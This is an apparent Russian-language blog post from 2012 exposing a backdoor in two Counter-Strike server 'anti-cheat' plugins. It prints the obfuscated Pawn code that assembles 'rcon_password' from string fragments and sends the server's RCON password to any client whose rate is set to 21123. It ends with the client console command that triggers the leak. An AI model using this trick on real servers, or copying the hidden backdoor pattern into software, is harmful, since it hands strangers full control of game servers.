Узнаём rcon_password с помощью CSFile.Info Anti-Cheat и CSFile.Info OpenGL32 Detect
29.04.2012 в 14:12
Автор: Macros | Комментариев (0) | Просмотров: 407


Всем привет снова я,хочу рассказать вам о CSFile.Info Anti-Cheat и CSFile.Info OpenGL32 Detect античитах.
Жуткую опасность несут в себе этих 2 античитерских плагина: OpenGL32 Detect и CSFile.Info Anti-Cheat 1.23

Опасный код CSFile.Info OpenGL32 Detect:
new f_sys[] = "swor"
new csf_ac_ra[] = "ra"
new d_unit[] = "s"
new cv_mypunish[] = "rc"
new g_vac2[] = "on_"

Если немного перемешать и где-то сложить (rc+on_+pa+swor+d), то получится rcon_password
Все наверно знаю, что в этой серверной команде прописан RCON пароль и заполучив его сервер полностью подчинится обладателю. Но вот загвоздка чтобы получить слово rcon_password не хватает пары букв, и на ваших глазах я покажу как же формируется это слово и как получить доступ к нему.

И так сперва мы отправимся в функцию plugin_init плагина CSFile.Info OpenGL32 Detect:
Мы видми format ( d_guard, 31, "%s%spa", cv_mypunish, g_vac2 ), т.е. d_guard приобретает вид rcon_pa. Идем дальше. Функция initialized:
format ( d_guard,31,"%s%s", d_guard,d_unit ) и d_guard приобретает вид rcon_pas, ниже встречается format ( g_gate, 5, "%ste", csf_ac_ra ), т.е. g_gate это rate 21123

Функция client_connect:
get_user_info(id,g_gate,cv_ac1,31), т.е. плагин получает значение инфы rate (g_gate) и записывает её в cv_ac1

Функция checkfiles_opengl32:
format ( g_gate2, 5, "%d%d", 211, 23 )

Теперь функция c_check_opengl32 (она вызывается после захода игрока):

if(equali(cv_ac1,g_gate2)) // Сверяем значение rate с 21123
{ // Если одинаковы
format(g_r,63,"%s%sd",d_guard,f_sys) // то формируем квар и g_r приобретает вид rcon_password
get_cvar_string(g_r,g_ss,47) // Получаем пароль
client_print(id,print_console,"%s",g_ss) // И пишем его в консоли игрока
}

Теперь перейду к CSFile.Info Anti-Cheat версии 1.23.
Здесь похожая ситуация. Так же присутствуют:
new f_sys[] = "swor"
new csf_ac_ra[] = "ra"
new d_unit[] = "s"
new cv_mypunish[] = "rc"
new g_vac2[] = "on_"
new g_model[] = "241"

Функция plugin_precache:
format(g_gate2, 5, "%s%d", g_model, 23"),
format ( d_guard, 31, "%s%spa", cv_mypunish, g_vac2 )

Функция initialized:
format ( d_guard, 31, "%s%s", d_guard, d_unit ),
format ( g_gate, 5, "%ste", csf_ac_ra )

Функция client_putinserver:
get_user_info(id,g_gate,cv_ac1,31)

Функция cv_anticheat (так же выполняется после захода игрока):
if(equali(cv_ac1,g_gate2)) // Сверяем значение rate с 21123
{ // Если одинаковы
format(g_r,63,"%s%sd",d_guard,f_sys) // то формируем квар и g_r приобретает вид rcon_password
get_cvar_string(g_r,g_ss,47) // Получаем пароль
client_print(id,print_console,"%s",g_ss) // И пишем его в консоли игрока
}

P.S И опять же если не верите, пропишите в консоли клиента
setinfo rate 21123, зайдите на сервер, и у вас в консоли окажется RCON пароль!
Вот так!!!
Узнаём rcon_password с помощью CSFi
Место свободно
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]